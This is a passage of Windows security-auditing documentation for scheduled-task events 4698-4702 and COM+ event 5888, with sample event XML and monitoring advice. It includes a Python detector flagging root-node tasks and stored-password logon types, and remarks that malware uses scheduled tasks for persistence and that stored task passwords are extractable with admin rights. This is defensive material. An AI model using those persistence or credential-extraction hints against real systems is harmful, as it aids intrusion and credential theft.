<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4698</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-23T02:03:06.944522200Z" />
<EventRecordID>344740</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="5048" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x364eb</Data>
<Data Name="TaskName">\\Microsoft\\StartListener</Data>
<Data Name="TaskContent"><?xml version="1.0" encoding="UTF-16"?> <Task version="1.2"
xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <Date>2015-09-
22T19:03:06.9258653</Date> <Author>CONTOSO\\dadmin</Author> </RegistrationInfo> <Triggers /> <Principals>
<Principal id="Author"> <RunLevel>LeastPrivilege</RunLevel> <UserId>CONTOSO\\dadmin</UserId>
<LogonType>InteractiveToken</LogonType> </Principal> </Principals> <Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate>
<StartWhenAvailable>false</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
<Priority>7</Priority> </Settings> <Actions Context="Author"> <Exec>
<Command>C:\\Documents\\listener.exe</Command> </Exec> </Actions> </Task></Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that requested the “create scheduled task” operation. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.
Account Name [Type = UnicodeString]: the name of the account that requested the “create scheduled task”
operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Task Information:
Task Name [Type = UnicodeString]: new scheduled task name. The format of this value is
“\task_path\task_name”, where task_path is a path in Microsoft Task Scheduler tree starting from “Task
Scheduler Library” node:

Task Content [Type = UnicodeString]: the XML content of the new task. For more information about the XML
format for scheduled tasks, see “XML Task Definition Format.”

Security Monitoring Recommendations
For 4698(S): A scheduled task was created.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

We recommend monitoring all scheduled task creation events, especially on critical computers or devices.
Scheduled tasks are often used by malware to stay in the system after reboot or for other malicious actions.
Monitor for new tasks located in the Task Scheduler Library root node, that is, where Task Name looks
like ‘\TASK_NAME’. Scheduled tasks that are created manually or by malware are often located in the Task
Scheduler Library root node.
In the new task, if the Task Content XML contains the <LogonType>Password</LogonType> value, trigger
an alert. In this case, the password for the account that will be used to run the scheduled task will be saved in
Credential Manager in cleartext format, and can be extracted using Administrative privileges.
4699(S): A scheduled task was deleted.
4/5/2019 • 3 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Other Object Access Events
Event Description:
This event generates every time a scheduled task is deleted.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4699</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-23T02:13:30.044244500Z" />
<EventRecordID>344827</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="5048" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x364eb</Data>
<Data Name="TaskName">\\Microsoft\\My</Data>
<Data Name="TaskContent"><?xml version="1.0" encoding="UTF-16"?> <Task version="1.2"
xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <Date>2015-08-
25T13:56:10.5315552</Date> <Author>CONTOSO\\dadmin</Author> </RegistrationInfo> <Triggers /> <Principals>
<Principal id="Author"> <RunLevel>LeastPrivilege</RunLevel> <UserId>CONTOSO\\dadmin</UserId>
<LogonType>Password</LogonType> </Principal> </Principals> <Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
<StartWhenAvailable>false</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
<Priority>7</Priority> </Settings> <Actions Context="Author"> <Exec>
<Command>C:\\Windows\\notepad.exe</Command> </Exec> </Actions> </Task></Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that requested the “delete scheduled task” operation. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.
Account Name [Type = UnicodeString]: the name of the account that requested the “delete scheduled task”
operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Task Information:
Task Name [Type = UnicodeString]: deleted scheduled task name. The format of this value is
“\task_path\task_name”, where task_path is a path in Microsoft Task Scheduler tree starting from “Task
Scheduler Library” node:

Task Content [Type = UnicodeString]: the XML of the deleted task. For more information about the XML format
for scheduled tasks, see “XML Task Definition Format.”

Security Monitoring Recommendations
For 4699(S): A scheduled task was deleted.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

We recommend monitoring all scheduled task deletion events, especially on critical computers or devices.
Scheduled tasks are often used by malware to stay in the system after reboot or for other malicious actions.
However, this event is not generated often.
Monitor for deleted tasks located in the Task Scheduler Library root node, that is, where Task Name looks
like ‘\TASK_NAME’. Scheduled tasks that are created manually or by malware are often located in the Task
Scheduler Library root node. Deletion of such tasks can be a sign of malicious activity.
If a highly critical scheduled task exists on some computers, and it should never be deleted, monitor for
4699 events with the corresponding Task Name.
4700(S): A scheduled task was enabled.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Other Object Access Events
Event Description:
This event generates every time a scheduled task is enabled.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4700</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-23T02:32:47.606423000Z" />
<EventRecordID>344861</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="756" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x364eb</Data>
<Data Name="TaskName">\\Microsoft\\StartListener</Data>
<Data Name="TaskContent"><?xml version="1.0" encoding="UTF-16"?> <Task version="1.2"
xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <Date>2015-09-
22T19:03:06.9258653</Date> <Author>CONTOSO\\dadmin</Author> </RegistrationInfo> <Triggers /> <Principals>
<Principal id="Author"> <RunLevel>LeastPrivilege</RunLevel> <UserId>CONTOSO\\dadmin</UserId>
<LogonType>InteractiveToken</LogonType> </Principal> </Principals> <Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate>
<StartWhenAvailable>false</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
<Priority>7</Priority> </Settings> <Actions Context="Author"> <Exec>
<Command>C:\\Documents\\listener.exe</Command> </Exec> </Actions> </Task></Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that requested the “enable scheduled task” operation. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.
Account Name [Type = UnicodeString]: the name of the account that requested the “enable scheduled
task” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Task Information:
Task Name [Type = UnicodeString]: enabled scheduled task name. The format of this value is
“\task_path\task_name”, where task_path is a path in Microsoft Task Scheduler tree starting from “Task
Scheduler Library” node:

Task Content [Type = UnicodeString]: the XML of the enabled task. For more information about the XML format
for scheduled tasks, see “XML Task Definition Format.”

Security Monitoring Recommendations
For 4700(S): A scheduled task was enabled.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If a highly critical scheduled task exists on some computers, and for some reason it should never be enabled,
monitor for 4700 events with the corresponding Task Name.
4701(S): A scheduled task was disabled.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Other Object Access Events
Event Description:
This event generates every time a scheduled task is disabled.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4701</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-23T02:32:45.844066600Z" />
<EventRecordID>344860</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="4364" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x364eb</Data>
<Data Name="TaskName">\\Microsoft\\StartListener</Data>
<Data Name="TaskContent"><?xml version="1.0" encoding="UTF-16"?> <Task version="1.2"
xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <Date>2015-09-
22T19:03:06.9258653</Date> <Author>CONTOSO\\dadmin</Author> </RegistrationInfo> <Triggers /> <Principals>
<Principal id="Author"> <RunLevel>LeastPrivilege</RunLevel> <UserId>CONTOSO\\dadmin</UserId>
<LogonType>InteractiveToken</LogonType> </Principal> </Principals> <Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate>
<StartWhenAvailable>false</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>false</Enabled> <Hidden>false</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
<Priority>7</Priority> </Settings> <Actions Context="Author"> <Exec>
<Command>C:\\Documents\\listener.exe</Command> </Exec> </Actions> </Task></Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that requested the “disable scheduled task” operation. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.
Account Name [Type = UnicodeString]: the name of the account that requested the “disable scheduled
task” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Task Information:
Task Name [Type = UnicodeString]: disabled scheduled task name. The format of this value is
“\task_path\task_name”, where task_path is a path in Microsoft Task Scheduler tree starting from “Task
Scheduler Library” node:

Task Content [Type = UnicodeString]: the XML of the disabled task. For more information about the XML format
for scheduled tasks, see “XML Task Definition Format.”

Security Monitoring Recommendations
For 4701(S): A scheduled task was disabled.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If a highly critical scheduled task exists on some computers, and it should never be disabled, monitor for 4701
events with the corresponding Task Name.
4702(S): A scheduled task was updated.
4/5/2019 • 3 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Other Object Access Events
Event Description:
This event generates every time a scheduled task is updated or changed.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4702</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-23T03:00:59.343820000Z" />
<EventRecordID>344863</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="596" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x364eb</Data>
<Data Name="TaskName">\\Microsoft\\StartListener</Data>
<Data Name="TaskContentNew"><?xml version="1.0" encoding="UTF-16"?> <Task version="1.2"
xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <Date>2015-09-
22T19:03:06.9258653</Date> <Author>CONTOSO\\dadmin</Author> </RegistrationInfo> <Triggers /> <Principals>
<Principal id="Author"> <RunLevel>HighestAvailable</RunLevel> <UserId>CONTOSO\\dadmin</UserId>
<LogonType>InteractiveToken</LogonType> </Principal> </Principals> <Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate>
<StartWhenAvailable>false</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
<Priority>7</Priority> </Settings> <Actions Context="Author"> <Exec>
<Command>C:\\Documents\\listener.exe</Command> </Exec> </Actions> </Task></Data>
</EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that requested the “change/update scheduled task” operation. Event
Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will
see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.
Account Name [Type = UnicodeString]: the name of the account that requested the “change/update
scheduled task” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Task Information:
Task Name [Type = UnicodeString]: updated/changed scheduled task name. The format of this value is
“\task_path\task_name”, where task_path is a path in Microsoft Task Scheduler tree starting from “Task
Scheduler Library” node:

Task New Content [Type = UnicodeString]: the new XML definition of the updated task. See “XML Task Definition Format” for more about the XML format for scheduled tasks.

Security Monitoring Recommendations

For 4702(S): A scheduled task was updated.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

Monitor for updated scheduled tasks located in the Task Scheduler Library root node, that is, where Task Name looks like ‘\TASK_NAME’. Scheduled tasks that are created manually or by malware are often located in the Task Scheduler Library root node.
If the Task New Content XML of the updated scheduled task contains the <LogonType>Password</LogonType> value, trigger an alert. In this case the password for the account that will be used to run the scheduled task is saved in Credential Manager in cleartext format and can be extracted with administrative privileges.
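Both recommendations can be checked mechanically over the event XML. The following Python script is an added example, not part of the original documentation: it parses a 4702 event, flags a Task Name directly under the Library root, and flags a Task New Content definition that contains <LogonType>Password</LogonType>. The sample events are constructed, and the data field names TaskName and TaskContentNew are assumed to match the 4702 event XML.

```python
"""Apply the 4702 monitoring recommendations to event XML: flag updated tasks
that live in the Task Scheduler Library root node (Task Name '\\TASK_NAME') and
tasks whose new definition uses <LogonType>Password</LogonType>."""
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

EVT_NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"
_XML_DECL = re.compile(r"^\s*<\?xml[^>]*\?>")


def event_fields(event_xml):
    """Return (EventID, {Data Name: text}) for one Security channel event."""
    root = ET.fromstring(event_xml)
    eid = root.findtext(f"{EVT_NS}System/{EVT_NS}EventID")
    return eid, {d.get("Name"): (d.text or "") for d in root.iter(EVT_NS + "Data")}


def is_root_node_task(task_name):
    """'\\Updater' sits in the Library root; '\\Microsoft\\Windows\\...\\X' does not."""
    return task_name.startswith("\\") and "\\" not in task_name[1:]


def stores_password(task_xml):
    """True when any LogonType element in the task definition is 'Password',
    i.e. the run-as account's password is stored in Credential Manager."""
    # The stored definition starts with an encoding="UTF-16" declaration, which
    # expat may reject when handed a str, so drop the declaration before parsing.
    try:
        task = ET.fromstring(_XML_DECL.sub("", task_xml, count=1))
    except ET.ParseError:
        return False
    # Compare local names so both namespaced and plain definitions are handled.
    return any(el.tag.rsplit("}", 1)[-1] == "LogonType"
               and (el.text or "").strip() == "Password"
               for el in task.iter())


def analyze_4702(event_xml):
    """Findings for one event: [] when nothing matches or it is not a 4702."""
    eid, data = event_fields(event_xml)
    if eid != "4702":
        return []
    findings = []
    if is_root_node_task(data.get("TaskName", "")):
        findings.append("root_node_task")
    if stores_password(data.get("TaskContentNew", "")):
        findings.append("password_stored")
    return findings


def make_4702(task_name, task_xml, subject="dadmin"):
    """Constructed sample event (not captured from a real system); TaskName and
    TaskContentNew are assumed to be the 4702 data field names."""
    return (f'<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
            f"<System><EventID>4702</EventID><Channel>Security</Channel></System>"
            f'<EventData><Data Name="SubjectUserName">{escape(subject)}</Data>'
            f'<Data Name="TaskName">{escape(task_name)}</Data>'
            f'<Data Name="TaskContentNew">{escape(task_xml)}</Data></EventData></Event>')


def task_definition(logon_type):
    """Minimal constructed task definition in the Task Scheduler XML schema."""
    return ('<?xml version="1.0" encoding="UTF-16"?>'
            '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
            '<Principals><Principal id="Author"><UserId>CONTOSO\\dadmin</UserId>'
            f"<LogonType>{logon_type}</LogonType></Principal></Principals>"
            '<Actions Context="Author"><Exec><Command>C:\\Windows\\System32\\notepad.exe</Command>'
            "</Exec></Actions></Task>")


# Constructed samples: one task in the Library root storing a password, one
# task under a Microsoft folder that runs with S4U and stores no password.
SUSPICIOUS = make_4702("\\Updater", task_definition("Password"))
BENIGN = make_4702("\\Microsoft\\Windows\\Defrag\\ScheduledDefrag", task_definition("S4U"))

if __name__ == "__main__":
    for name, ev in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, analyze_4702(ev))
```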
5888(S): An object in the COM+ Catalog was modified.
4/5/2019 • 5 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Other Object Access Events
Event Description:
This event generates when an object in the COM+ Catalog was modified.
Although this event is listed under the Audit System Integrity subcategory, it is generated when this subcategory (Audit Other Object Access Events) is enabled.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>5888</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12290</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-23T20:37:22.400120200Z" />
<EventRecordID>344994</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="1352" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectUserDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">222443</Data>
<Data Name="ObjectCollectionName">Applications</Data>
<Data Name="ObjectIdentifyingProperties">ID = {1D34B2DC-0E43-4040-BA7B-2F1C181FD86A} AppPartitionID =
{41E90F3E-56C1-4633-81C3-6E8BAC8BDD70}</Data>
<Data Name="ModifiedObjectProperties">Name = 'COMApp' -> 'COMApp-New' cCOL_SecurityDescriptor = '<Opaque>' ->
'<Opaque>'</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that requested the “modify/change object” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID ) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “modify/change
object” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Object:
COM+ Catalog Collection [Type = UnicodeString]: the name of COM+ collection in which the object was
modified. Here is the list of possible collection values with descriptions:

COLLECTION                     DESCRIPTION
ApplicationCluster             Contains a list of the servers in the application cluster.
ApplicationInstances           Contains an object for each instance of a running COM+ application.
Applications                   Contains an object for each COM+ application installed on the local computer.
Components                     Contains an object for each component in the application to which it is related.
ComputerList                   Contains a list of the computers found in the Computers folder of the Component Services administration tool.
DCOMProtocols                  Contains a list of the protocols to be used by DCOM. It contains an object for each protocol.
ErrorInfo                      Retrieves extended error information regarding methods that deal with multiple objects.
EventClassesForIID             Retrieves information regarding event classes.
FilesForImport                 Retrieves information from its MSI file about an application that can be imported.
InprocServers                  Contains a list of the in-process servers registered with the system. It contains an object for each component.
InterfacesForComponent         Contains an object for each interface exposed by the component to which the collection is related.
LegacyComponents               Contains an object for each unconfigured component in the application to which it is related.
LegacyServers                  Identical to the InprocServers collection except that this collection also includes local servers.
LocalComputer                  Contains a single object that holds computer level settings information for the computer whose catalog you are accessing.
MethodsForInterface            Contains an object for each method on the interface to which the collection is related.
Partitions                     Used to specify the applications contained in each partition.
PartitionUsers                 Used to specify the users contained in each partition.
